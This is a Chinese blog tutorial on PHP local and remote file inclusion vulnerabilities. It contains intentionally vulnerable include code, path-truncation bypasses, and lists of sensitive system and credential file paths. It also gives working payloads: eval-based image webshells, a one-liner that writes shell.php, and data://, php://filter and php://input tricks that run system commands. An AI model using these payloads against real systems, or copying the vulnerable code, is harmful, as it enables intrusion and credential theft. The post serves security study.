<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>文件包含、读取、下载漏洞 | 忆 执 昔 来 的 旅 途</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  <meta name="keywords" content="Web文件包含漏洞" />
  
  
  
  
  <meta name="description" content="概述：有关文件的常见漏洞：包括文件包含漏洞、文件读取漏洞、文件下载漏洞。">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含、读取、下载漏洞">
<meta property="og:url" content="https://xizhi-future.github.io/2021/06/06/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E3%80%81%E8%AF%BB%E5%8F%96%E3%80%81%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="忆 执 昔 来 的 旅 途">
<meta property="og:description" content="概述：有关文件的常见漏洞：包括文件包含漏洞、文件读取漏洞、文件下载漏洞。">
<meta property="og:locale">
<meta property="og:image" content="https://i.loli.net/2021/06/06/Ru6oXCK2HdIsFUM.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/8Bs1QMyRnJTFD4X.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/3jC1BIWe9Yzbs5E.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/pAUSdNBoYa6E2Mt.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/WJlUqRgMnVDtdSZ.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/S3LQRuwE56K7xMP.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/cSkUEnR92hAzdoC.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/GEL5RNbdKfkTQFa.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210214200538890.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/ljnfQ3vE6tPc1g9.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/2z7K3Qhl5eo4Esk.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/tRi7pVXsmoD3FGb.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/7Wibc8HMSTa2wnL.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/a6im4kHOnDxGTgl.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/34l7JGxMkEKY68V.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/zmopQn46y7eGaD2.png">
<meta property="og:image" content="c:/Users/yinanping/AppData/Roaming/Typora/typora-user-images/image-20210415202541715.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/o1q26TgN9bXkZSx.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/vmLCkaI6n7BijH1.png">
<meta property="og:image" content="c:/Users/yinanping/AppData/Roaming/Typora/typora-user-images/image-20210415204235730.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/9PtsoLqbQjHOp8N.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/IcqNsdGBAlmR1Fp.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/ReYczFwK9ynPWig.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/Q2gfFwHPAX9qupz.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/9gNbeQPLd6tnR8Y.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/wTDhREYW9raUn3q.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/FtEn59ZComH3yjQ.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/xOwvqE3ZpmLoD8u.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/NAV1aX5RgYbvziw.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/oR1MgfS46UjmDvt.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/fr6YQiKVB7qp5Fl.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/yI8CPVnWKeTUt7k.png">
<meta property="og:image" content="https://i.loli.net/2021/06/06/iHBaV47crbIFKRd.png">
<meta property="article:published_time" content="2021-06-06T14:42:17.000Z">
<meta property="article:modified_time" content="2021-07-09T07:26:47.102Z">
<meta property="article:author" content="xizhi-future">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="文件包含">
<meta property="article:tag" content="漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/06/06/Ru6oXCK2HdIsFUM.png">
  
    <link rel="alternate" href="/atom.xml" title="忆 执 昔 来 的 旅 途" type="application/atom+xml">
  

  

  <link rel="icon" href="/css/images/mylogo.jpg">
  <link rel="apple-touch-icon" href="/css/images/mylogo.jpg">
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link href="https://fonts.googleapis.com/css?family=Open+Sans|Montserrat:700" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Roboto:400,300,300italic,400italic" rel="stylesheet" type="text/css">
  <link href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet">
  <style type="text/css">
    @font-face{font-family:futura-pt; src:url("/css/fonts/FuturaPTBold.otf") format("woff");font-weight:500;font-style:normal;}
    @font-face{font-family:futura-pt-light; src:url("/css/fonts/FuturaPTBook.otf") format("woff");font-weight:lighter;font-style:normal;}
    @font-face{font-family:futura-pt-italic; src:url("/css/fonts/FuturaPTBookOblique.otf") format("woff");font-weight:400;font-style:italic;}
}

  </style>
  
<link rel="stylesheet" href="/css/style.css">


  
<script src="/js/jquery-3.1.1.min.js"></script>

  
<script src="/js/bootstrap.js"></script>


  <!-- Bootstrap core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.css" >

  
    
<link rel="stylesheet" href="/css/dialog.css">

  

  

  
    <link rel="stylesheet" href="/css/header-post.css" >
  

  
  
  
    <link rel="stylesheet" href="/css/vdonate.css" >
  

<meta name="generator" content="Hexo 5.4.0"></head>



  <body data-spy="scroll" data-target="#toc" data-offset="50">


  
  <div id="container">
    <div id="wrap">
      
        <header>

    <div id="allheader" class="navbar navbar-default navbar-static-top" role="navigation">
        <div class="navbar-inner">
          
          <div class="container"> 
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
              <span class="sr-only">Toggle navigation</span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
            </button>

            
              <a class="brand" style="
                 margin-top: 0px;"  
                href="#" data-toggle="modal" data-target="#myModal" >
                  <img width="124px" height="124px" alt="Hike News" src="/css/images/mylogo.jpg">
              </a>
            
            
            <div class="navbar-collapse collapse">
              <ul class="hnav navbar-nav">
                
                  <li> <a class="main-nav-link" href="/">Home</a> </li>
                
                  <li> <a class="main-nav-link" href="/archives">Archives</a> </li>
                
                  <li> <a class="main-nav-link" href="/categories">Categories</a> </li>
                
                  <li> <a class="main-nav-link" href="/tags">Tags</a> </li>
                
                  <li> <a class="main-nav-link" href="/friendly-links">友情链接</a> </li>
                
                  <li> <a class="main-nav-link" href="/about">About</a> </li>
                
                  <li><div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div></li>
            </div>
          </div>
                
      </div>
    </div>

</header>



      
            
      <div id="content" class="outer">
        
          <section id="main" style="float:none;"><article id="post-文件包含、读取、下载漏洞" style="width: 75%; float:left;" class="article article-type-post" itemscope itemprop="blogPost" >
  <div id="articleInner" class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="thumb" class="article-title" itemprop="name">
      文件包含、读取、下载漏洞
    </h1>
  

      </header>
    
    <div class="article-meta">
      
	<a href="/2021/06/06/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E3%80%81%E8%AF%BB%E5%8F%96%E3%80%81%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E/" class="article-date">
	  <time datetime="2021-06-06T14:42:17.000Z" itemprop="datePublished">2021-06-06</time>
	</a>

      
    <a class="article-category-link" href="/categories/Web/">Web</a><a class="article-category-link" href="/categories/Web/%E6%BC%8F%E6%B4%9E/">漏洞</a>

      
	<a class="article-views">
	<span id="busuanzi_container_page_pv">
		PV:<span id="busuanzi_value_page_pv"></span>
	</span>
	</a>

      

    </div>
    <div class="article-entry" itemprop="articleBody">
      
        <p>概述：有关文件的常见漏洞：包括文件包含漏洞、文件读取漏洞、文件下载漏洞。</p>
<span id="more"></span>

<h1 id="一、文件包含漏洞–文件被解析"><a href="#一、文件包含漏洞–文件被解析" class="headerlink" title="一、文件包含漏洞–文件被解析"></a>一、文件包含漏洞–文件被解析</h1><p>就是将所包含的文件当作脚本去执行</p>
<p><strong>PHP当中包含函数</strong></p>
<table>
<thead>
<tr>
<th>函数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>include()</td>
<td>文件包含失败时，会产生 <code>警告</code>，但脚本 <code>将继续执行</code></td>
</tr>
<tr>
<td>include_once()</td>
<td>作用与include()相同，但文件只会被包含一次</td>
</tr>
<tr>
<td>require()</td>
<td>文件包含失败时，会产生 <code>错误</code>， <code>直接结束脚本执行</code></td>
</tr>
<tr>
<td>require_once()</td>
<td>作用与require()相同，但文件只会被包含一次</td>
</tr>
<tr>
<td><strong>成因</strong></td>
<td></td>
</tr>
</tbody></table>
<p>1.Web应用实现了 <code>动态包含</code><br>2.动态包含的文件路径参数，<code>客户端可控</code></p>
<p><strong>相关配置</strong></p>
<p>本地文件包含 (LFI)：可以读取与打开本地文件<br>远程文件包含 (RFI)(HTTP,FTP,PHP伪协议)：可以远程加载文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php.ini文件：</span><br><span class="line">本地：allow_url_fopen<span class="operator">=</span><span class="keyword">On</span><span class="operator">/</span>Off</span><br><span class="line">远程：allow_url_include<span class="operator">-</span><span class="keyword">On</span><span class="operator">/</span>Off</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>];</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;?path=info.php&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">本地：可通过相对路径方式找到文件</span><br><span class="line">?path=info.php</span><br><span class="line">远程：可通过http(s)或者ftp等方式远程加载文件</span><br><span class="line">?path=http:<span class="comment">//......info.php</span></span><br><span class="line">?path=ftp:<span class="comment">//......info.php</span></span><br></pre></td></tr></table></figure>
<p><strong>分类</strong></p>
<p><code>allow_url_fopen = On  allow_url_include = On</code></p>
<ul>
<li><strong>本地文件包含</strong>：通过浏览器包含web服务器上的文件，这种漏洞是因为浏览器包含文件时没有进行严格的过滤允许遍历目录的字符注入浏览器并执行</li>
<li><strong>远程文件包含</strong>：就是允许攻击者包含一个远程的文件,一般是在远程服务器上预先设置好的脚本。 此漏洞是因为浏览器对用户的输入没有进行检查，导致不同程度的信息泄露、拒绝服务攻击 甚至在目标服务器上执行代码</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?path=http://192.168.158.119/phpinfo.php</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/Ru6oXCK2HdIsFUM.png" alt="image-20210415205303941"></p>
<h2 id="1-漏洞说明"><a href="#1-漏洞说明" class="headerlink" title="1. 漏洞说明"></a>1. 漏洞说明</h2><h3 id="1-1-无视文件扩展名读取文件"><a href="#1-1-无视文件扩展名读取文件" class="headerlink" title="1.1 无视文件扩展名读取文件"></a>1.1 无视文件扩展名读取文件</h3><p>使用 <code>文件包含</code> 时，php会读取文件的源码，即使是图片文件。当通过文件包含的方式打开一张图片时，会发现并没有打开图像，而是图片的 <code>源码</code> 。</p>
<h3 id="1-2-无条件解析PHP代码"><a href="#1-2-无条件解析PHP代码" class="headerlink" title="1.2 无条件解析PHP代码"></a>1.2 无条件解析PHP代码</h3><p><code>文件包含</code> 在读取文件源码的同时，如果遇到符合php语法规范的代码，就会无条件执行。无论是什么格式的文件。<br>例如：<br>phpinfo.zip<br>phpinfo.rar</p>
<p>phpinfo.txt</p>
<p><img src="https://i.loli.net/2021/06/06/8Bs1QMyRnJTFD4X.png" alt="image-20210415190302699"></p>
<p><img src="https://i.loli.net/2021/06/06/3jC1BIWe9Yzbs5E.png" alt="image-20210415190355325"></p>
<h3 id="1-3-空字符安全绕过–00截断"><a href="#1-3-空字符安全绕过–00截断" class="headerlink" title="1.3 空字符安全绕过–00截断"></a>1.3 空字符安全绕过–00截断</h3><p><strong>条件：PHP版本小于5.3.4，并且关闭魔术引号  <code>magic_quotes_gpc = Off</code></strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">index.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>].<span class="string">&quot;.html&quot;</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;?path=[path]&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">index.html</span><br><span class="line">&lt;h1&gt;Hello World!&lt;/h1&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/06/06/pAUSdNBoYa6E2Mt.png" alt="在这里插入图片描述"></p>
<p><strong>魔术引号的存在</strong><br><img src="https://i.loli.net/2021/06/06/WJlUqRgMnVDtdSZ.png" alt="在这里插入图片描述"><strong>关闭魔术引号</strong><br><img src="https://i.loli.net/2021/06/06/S3LQRuwE56K7xMP.png" alt="在这里插入图片描述"><strong>验证</strong><br><img src="https://i.loli.net/2021/06/06/cSkUEnR92hAzdoC.png" alt="在这里插入图片描述"></p>
<h3 id="1-4-长度截断"><a href="#1-4-长度截断" class="headerlink" title="1.4 长度截断"></a>1.4 长度截断</h3><p>利用操作系统对目录最大长度的限制，可以不需要 <code>%00</code> 而达到截断的目的</p>
<p>目录字符串，在 <code>window下256字节、linux下4096字节</code> 时会达到最大值，最大值长度之后的字符将被丢弃。</p>
<p>而利用”./“的方式即可构造出超长目录字符串</p>
<p><strong>条件：Windows系统，</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">index.php <span class="comment">#限制了文件后缀</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>].<span class="string">&quot;.html&quot;</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;?path=[path]&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span>   </span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/GEL5RNbdKfkTQFa.png" alt="image-20210415194538865"></p>
<h3 id="1-5-问号-20-23-截断"><a href="#1-5-问号-20-23-截断" class="headerlink" title="1.5 问号,%20,%23 截断"></a>1.5 问号,%20,%23 截断</h3><p>远程文件包含时，如果出现</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">index.php <span class="comment">#限制了文件后缀</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>].<span class="string">&quot;.html&quot;</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;?path=[path]&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#绕过：添加问号 结合HTTP传参的原理,问号&quot;?&quot;后面的代码被解释成URL的querystring</span></span><br><span class="line">?path=http:<span class="comment">//192.168.158.119/phpinfo.php?</span></span><br><span class="line">?path=http:<span class="comment">//192.168.158.119/phpinfo.php%20</span></span><br><span class="line">?path=http:<span class="comment">//192.168.158.119/phpinfo.php%23</span></span><br></pre></td></tr></table></figure>

<h2 id="2-漏洞利用"><a href="#2-漏洞利用" class="headerlink" title="2. 漏洞利用"></a>2. 漏洞利用</h2><h3 id="2-1读取敏感文件"><a href="#2-1读取敏感文件" class="headerlink" title="2.1读取敏感文件"></a>2.1读取敏感文件</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">使用绝对路径：</span><br><span class="line">http:<span class="comment">//192.168.199.131/include/include.php?path=c:\windows\System32\drivers\etc\hosts</span></span><br><span class="line"></span><br><span class="line">如果当前文件夹与所要包含的文件夹在同一盘符下：</span><br><span class="line">    #可目录穿越</span><br><span class="line">http:<span class="comment">//192.168.199.131/include/include.php?path=..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts</span></span><br></pre></td></tr></table></figure>
<h4 id="2-1-1-常见敏感信息路径"><a href="#2-1-1-常见敏感信息路径" class="headerlink" title="2.1.1 常见敏感信息路径"></a>2.1.1 常见敏感信息路径</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#Windows系统</span></span><br><span class="line"></span><br><span class="line">c:\boot.ini <span class="comment">// 查看系统版本</span></span><br><span class="line"></span><br><span class="line">c:\windows\system32\inetsrv\MetaBase.xml <span class="comment">// IIS配置文件</span></span><br><span class="line"></span><br><span class="line">c:\windows\repair\sam <span class="comment">// 存储Windows系统初次安装的密码</span></span><br><span class="line"></span><br><span class="line">c:\ProgramFiles\mysql\my.ini <span class="comment">// MySQL配置</span></span><br><span class="line"></span><br><span class="line">c:\ProgramFiles\mysql\data\mysql\user.MYD <span class="comment">// MySQL root密码</span></span><br><span class="line"></span><br><span class="line">c:\windows\php.ini <span class="comment">// php 配置信息</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#Linux/Unix系统</span></span><br><span class="line"></span><br><span class="line">/etc/passwd <span class="comment">// 账户信息</span></span><br><span class="line"></span><br><span class="line">/etc/shadow <span class="comment">// 账户密码文件</span></span><br><span class="line"></span><br><span class="line">/usr/local/app/apache2/conf/httpd.conf <span class="comment">// Apache2默认配置文件</span></span><br><span class="line"></span><br><span class="line">/usr/local/app/apache2/conf/extra/httpd-vhost.conf <span class="comment">// 虚拟网站配置</span></span><br><span class="line"></span><br><span class="line">/usr/local/app/php5/lib/php.ini <span class="comment">// PHP相关配置</span></span><br><span class="line"></span><br><span class="line">/etc/httpd/conf/httpd.conf <span class="comment">// Apache配置文件</span></span><br><span class="line"></span><br><span class="line">/etc/my.conf <span class="comment">// mysql 配置文件</span></span><br></pre></td></tr></table></figure>

<h3 id="2-2-包含图片木马"><a href="#2-2-包含图片木马" class="headerlink" title="2.2 包含图片木马"></a>2.2 包含图片木马</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//192.168.199.131/include/include.php?path=./future_ma1.jpg</span></span><br><span class="line"></span><br><span class="line">future_ma1.jpg 是经过 &lt;?php @eval($_REQUEST[<span class="string">&#x27;aaa&#x27;</span>]); ?&gt; 处理过的图片木马</span><br><span class="line"></span><br><span class="line">可中国蚁剑进行连接</span><br></pre></td></tr></table></figure>
<h3 id="2-3-包含木马写-shell"><a href="#2-3-包含木马写-shell" class="headerlink" title="2.3 包含木马写 shell"></a>2.3 包含木马写 shell</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">将如下代码插入图片当中：</span><br><span class="line">&lt;?<span class="function">php <span class="title">fputs</span><span class="params">(fopen(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&quot;&lt;?php @eval($_REQUEST[&#x27;cmd&#x27;])?&gt;&quot;</span>)</span></span>; ?&gt;</span><br><span class="line">含义：在当前目录下创建一个shell.php文件，内容为&lt;?php @eval($_REQUEST[<span class="string">&#x27;cmd&#x27;</span>])?&gt;一句话木马，当直接包含文件时，就会执行。</span><br></pre></td></tr></table></figure>

<h3 id="2-4-PHP-封装协议"><a href="#2-4-PHP-封装协议" class="headerlink" title="2.4 PHP 封装协议"></a>2.4 PHP 封装协议</h3><p><strong>条件</strong>：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php.ini文件：</span><br><span class="line">本地：allow_url_fopen<span class="operator">=</span><span class="keyword">On</span></span><br><span class="line">远程：allow_url_include<span class="operator">=</span><span class="keyword">On</span></span><br></pre></td></tr></table></figure>
<h4 id="2-4-1-访问本地文件"><a href="#2-4-1-访问本地文件" class="headerlink" title="2.4.1 访问本地文件"></a>2.4.1 访问本地文件</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#使用file://协议</span></span><br><span class="line">?path=file:<span class="comment">//c:\windows\System32\drivers\etc\hosts</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#data://协议</span></span><br><span class="line">?path=data:<span class="comment">//text/plain,<span class="meta">&lt;?php</span> phpinfo(); <span class="meta">?&gt;</span></span></span><br><span class="line">?path=data:<span class="comment">//text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#具体示例：</span></span><br><span class="line"><span class="comment">#当前文件路径</span></span><br><span class="line">?page=data:<span class="comment">//text/plain, <span class="meta">&lt;?php</span> echo $_SERVER[&#x27;DOCUMENT_ROOT&#x27;]; <span class="meta">?&gt;</span> </span></span><br><span class="line">    </span><br><span class="line"><span class="comment">#遍历当前路径下的所有文件</span></span><br><span class="line">?page=data:<span class="comment">//text/plain, <span class="meta">&lt;?php</span> print_r(scandir(&#x27;/var/www&#x27;))<span class="meta">?&gt;</span></span></span><br><span class="line">    </span><br><span class="line"><span class="comment">#读取指定文件    </span></span><br><span class="line">?page=data:<span class="comment">//text/plain, <span class="meta">&lt;?php</span> $a = file_get_contents(&#x27;fl4gisisish3r3.php&#x27;);echo htmlentities($a); <span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<h4 id="2-4-2-读取PHP文件"><a href="#2-4-2-读取PHP文件" class="headerlink" title="2.4.2 读取PHP文件"></a>2.4.2 读取PHP文件</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?path=php:<span class="comment">//filter/read=convert.base64-encode/resource=phpinfo.php</span></span><br><span class="line"></span><br><span class="line">将所得内容进行 base64解码即可</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210214200538890.png" alt="在这里插入图片描述"><br><img src="https://i.loli.net/2021/06/06/ljnfQ3vE6tPc1g9.png" alt="在这里插入图片描述"></p>
<h4 id="2-4-3-执行PHP命令"><a href="#2-4-3-执行PHP命令" class="headerlink" title="2.4.3 执行PHP命令"></a>2.4.3 执行PHP命令</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?file=php:<span class="comment">//input</span></span><br><span class="line">post:<span class="meta">&lt;?php</span> system(<span class="string">&#x27;ipconfig&#x27;</span>);<span class="meta">?&gt;</span></span><br><span class="line">     <span class="meta">&lt;?php</span> system(<span class="string">&#x27;whoami&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/2z7K3Qhl5eo4Esk.png" alt="在这里插入图片描述"></p>
<h3 id="2-5-包含日志文件"><a href="#2-5-包含日志文件" class="headerlink" title="2.5 包含日志文件"></a>2.5 包含日志文件</h3><p><strong>nigux 日志文件路径</strong></p>
<blockquote>
<p>/var/log/nginx/assess.log</p>
<p>/var/log/nginx/error.log</p>
</blockquote>
<p><strong>apache+Linux日志默认路径</strong></p>
<blockquote>
<p>/etc/httpd/logs/access_log/var/log/httpd/access_log</p>
</blockquote>
<p><strong>apache+win2003日志默认路径</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">D:\xampp\apache\logs\access.log</span><br><span class="line">D:\xampp\apache\logs\error.log</span><br></pre></td></tr></table></figure>

<p><strong>IIS6.0+win2003默认日志文件</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\WINDOWS\system32\Logfiles</span><br></pre></td></tr></table></figure>

<p><strong>IIS7.0+win2003 默认日志文件</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%SystemDrive%inetpublogsLogFiles</span><br></pre></td></tr></table></figure>

<p>nginx 日志文件在用户安装目录的logs目录下</p>
<p>如安装目录为/usr/local/nginx,则日志目录就是在/usr/local/nginx/logs里</p>
<p>也可通过其配置文件Nginx.conf，获取到日志的存在路径（/opt/nginx/logs/access.log）</p>
